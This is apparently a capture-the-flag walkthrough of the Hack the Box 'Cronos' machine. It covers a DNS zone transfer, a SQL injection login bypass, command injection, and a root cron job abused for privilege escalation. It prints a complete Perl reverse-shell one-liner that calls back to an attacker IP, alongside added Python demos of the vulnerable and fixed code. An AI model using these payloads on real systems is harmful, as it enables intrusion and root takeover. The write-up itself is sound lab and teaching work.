Hack the Box – Cronos Walkthrough

Today we’re going to solve another CTF machine, “Cronos”. The box is now retired, so it is only accessible to VIP members.
Introduction
Specifications
- Target OS: Linux
- Services: SSH, HTTP, ISC Bind
- IP Address: 10.10.10.13
- Difficulty: Medium
Weakness
- SQL Injection
- Cron running as root
Contents
- Getting user
- Getting root
Reconnaissance
As always, the first step is reconnaissance, starting with a port scan.
Ports Scanning
During this step we identify which services are listening behind the IP address. The scan shows the three services listed above: SSH, HTTP and ISC BIND (DNS).
Dig
After spending some time enumerating directories on the web server we found nothing. Since the box also runs BIND, the next step was to try a DNS zone transfer (AXFR) with dig.
dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.10.6-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.          604800  IN  SOA  cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.          604800  IN  NS   ns1.cronos.htb.
cronos.htb.          604800  IN  A    10.10.10.13
admin.cronos.htb.    604800  IN  A    10.10.10.13
ns1.cronos.htb.      604800  IN  A    10.10.10.13
www.cronos.htb.      604800  IN  A    10.10.10.13
cronos.htb.          604800  IN  SOA  cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 311 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Wed Nov 28 17:22:46 CET 2018
;; XFR size: 7 records (messages 1, bytes 203)
The zone transfer reveals admin.cronos.htb (the server allows AXFR from anyone, which is itself a misconfiguration). After adding the name to /etc/hosts and browsing to it we find an administrator login page.
Login
Brute forcing the form with different wordlists and usernames did not work, so we tried SQL injection with sqlmap.
sqlmap -r sqlmap.req --level=5 --risk=3
sqlmap.req contains the captured POST request of a login attempt:
POST / HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://admin.cronos.htb/
Cookie: PHPSESSID=dnurhq6mp01mvc7thl7t4v56t3
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=admin&password=admin
sqlmap reports that the username field is vulnerable to SQL injection.
Alternatively, the injection can be exploited by hand; the OWASP SQL injection page describes the different techniques.
Enter admin'-- - as the username with any password. The single quote closes the string literal and -- comments out the rest of the query, including the password check, so the login succeeds as admin.
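To show exactly why admin'-- - works, here is an added example (not code from the page or from the Cronos box) that reproduces the login check in Python against an in-memory SQLite table: one version builds the query by string concatenation, the other uses a parameterised query. The table contents, the column names and the stand-in password are constructed for the demo; the real admin panel's schema is not shown on the page.

```python
import sqlite3

# Constructed in-memory stand-in for the admin panel's user table.
# Plaintext passwords only to keep the demo short; real code stores hashes.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'secret-not-admin')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """String-built query: user input becomes SQL syntax."""
    sql = ("SELECT id FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    # With username admin'-- - the statement becomes
    #   SELECT id FROM users WHERE username = 'admin'-- -' AND password = '...'
    # and everything after -- is a comment, so the password is never checked.
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, username, password):
    """Parameterised query: the input is bound as data, never parsed as SQL."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

PAYLOAD = "admin'-- -"   # the username used in the walkthrough

def demo():
    conn = make_db()
    return {
        "vuln_bypass": login_vulnerable(conn, PAYLOAD, "anything"),
        "vuln_wrong_pw": login_vulnerable(conn, "admin", "anything"),
        "safe_bypass": login_safe(conn, PAYLOAD, "anything"),
        "safe_real": login_safe(conn, "admin", "secret-not-admin"),
    }

if __name__ == "__main__":
    print(demo())
```

With the vulnerable query the payload logs in without the password, while the same payload against the parameterised query is just a username that does not exist. Note the trailing space and dash after -- : MySQL requires whitespace after the comment marker, and the extra character keeps the space from being trimmed by the browser or a proxy.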
Command Injection
Once logged in, the admin page takes user input and passes it to a system command without filtering. We can therefore append ';' followed by a command of our own to the input, and the shell runs both.
See Example 6 on the OWASP Command Injection page: https://www.owasp.org/index.php/Command_Injection
Let’s get a reverse shell.
Perl is installed on the target, so we use a Perl reverse shell. Start a listener on the attacking machine first (nc -lvnp 1337; 10.10.14.4 is the attacker IP in the payload), then submit the following as the command input:
;perl -e 'use Socket;$i="10.10.14.4";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
And we get a shell on the box.
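The ';' trick above works because the input is concatenated into a shell command line. The following added example (mine, not from the page or the Cronos application, whose source is not shown) reproduces that pattern in Python and places a hardened version beside it. The command "echo lookup <target>" is an assumed placeholder for whatever network command the admin page really runs; the payload string is constructed for the demo and uses echo rather than a reverse shell so it is safe to run locally.

```python
import re
import subprocess

def net_tool_vulnerable(target):
    """Concatenates user input into a shell command line and runs it through
    /bin/sh: a ';' in the input ends our argument and starts a second command."""
    out = subprocess.run("echo lookup " + target, shell=True,
                         capture_output=True, text=True)
    return out.stdout

# Allow-list: hostnames and IPv4 addresses only. Assumed policy for the demo.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")

def net_tool_safe(target):
    """Validate the input, then pass it as one argv element with no shell.
    Even with argv lists, reject leading '-' so the value cannot become an option."""
    if not HOST_RE.match(target) or target.startswith("-"):
        raise ValueError("rejected target: %r" % target)
    out = subprocess.run(["echo", "lookup", target],
                         capture_output=True, text=True)
    return out.stdout

# Constructed payload: a valid-looking address, then ';' and our own command.
INJECTED = "10.10.14.4; echo INJECTED"

if __name__ == "__main__":
    print(net_tool_vulnerable(INJECTED))       # second line shows INJECTED
    try:
        print(net_tool_safe(INJECTED))
    except ValueError as e:
        print(e)                               # the safe version refuses it
```

Swap "echo INJECTED" for the Perl one-liner from the page and the vulnerable function gives the same reverse shell the walkthrough gets. The hardened function shows the two fixes that matter: never hand user input to a shell, and only accept the characters the feature actually needs.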
Privilege Escalation
We have a low-privileged shell; now we need to escalate to root. Running a privilege escalation script gives the basic information quickly; I normally use LinEnum.sh. Looking through its output, /etc/crontab contains a job that runs a file as root every minute.
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

The interesting entry is the last one, which runs every minute as root:
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
Because root runs php /var/www/laravel/artisan every minute, anything we can put into that file executes as root. Check the ownership and permissions first (ls -l /var/www/laravel/artisan); if the file is writable by our shell user, replace its contents with a PHP reverse shell, keep the listener open, and cron gives us a root shell within a minute.
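The check that matters here, "which root cron jobs reference a file I can write?", is easy to automate. The following added example (mine, not from the page or from LinEnum) parses system-crontab text, keeps the entries that run as root, pulls out the absolute paths in each command and tests them with os.access. The embedded crontab text is constructed from the listing above; demo() creates a temporary writable file standing in for artisan so the result can be reproduced anywhere. In Python only because the rest of this page's examples are; on the box itself the same idea is a few lines of shell.

```python
import os
import tempfile

# System crontab as shown in the walkthrough, embedded as constructed input.
CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""

def root_jobs(text):
    """Return (schedule, command) for every system-crontab entry that runs as root."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                      # blank, comment or VAR=value line
        fields = line.split(None, 6)      # m h dom mon dow user command
        if len(fields) < 7:
            continue
        schedule, user, command = " ".join(fields[:5]), fields[5], fields[6]
        if user == "root":
            jobs.append((schedule, command))
    return jobs

def script_paths(command):
    """Absolute paths mentioned in a cron command (scripts, interpreter args)."""
    cleaned = command.replace("(", " ").replace(")", " ")
    return [tok for tok in cleaned.split() if tok.startswith("/")]

def writable_root_jobs(text):
    """(schedule, path) for root jobs whose referenced regular file we can write."""
    hits = []
    for schedule, command in root_jobs(text):
        for path in script_paths(command):
            if os.path.isfile(path) and os.access(path, os.W_OK):
                hits.append((schedule, path))
    return hits

def demo():
    """Simulate the Cronos finding with a temporary, writable stand-in for artisan."""
    with tempfile.NamedTemporaryFile("w", suffix="-artisan", delete=False) as f:
        f.write("<?php // placeholder for /var/www/laravel/artisan\n")
        fake = f.name
    try:
        text = CRONTAB + "* * * * * root php %s schedule:run\n" % fake
        return writable_root_jobs(text), fake
    finally:
        os.unlink(fake)

if __name__ == "__main__":
    for schedule, path in writable_root_jobs(open("/etc/crontab").read()):
        print("root job [%s] runs writable file %s" % (schedule, path))
```

Run as the www-data shell on a real target, the main block reads /etc/crontab and prints each root job whose script the current user can modify. The directory entries (/etc/cron.hourly) and /dev/null are skipped because they are not regular files; a directory that is writable would be a separate finding (drop a script into it) that this check does not cover.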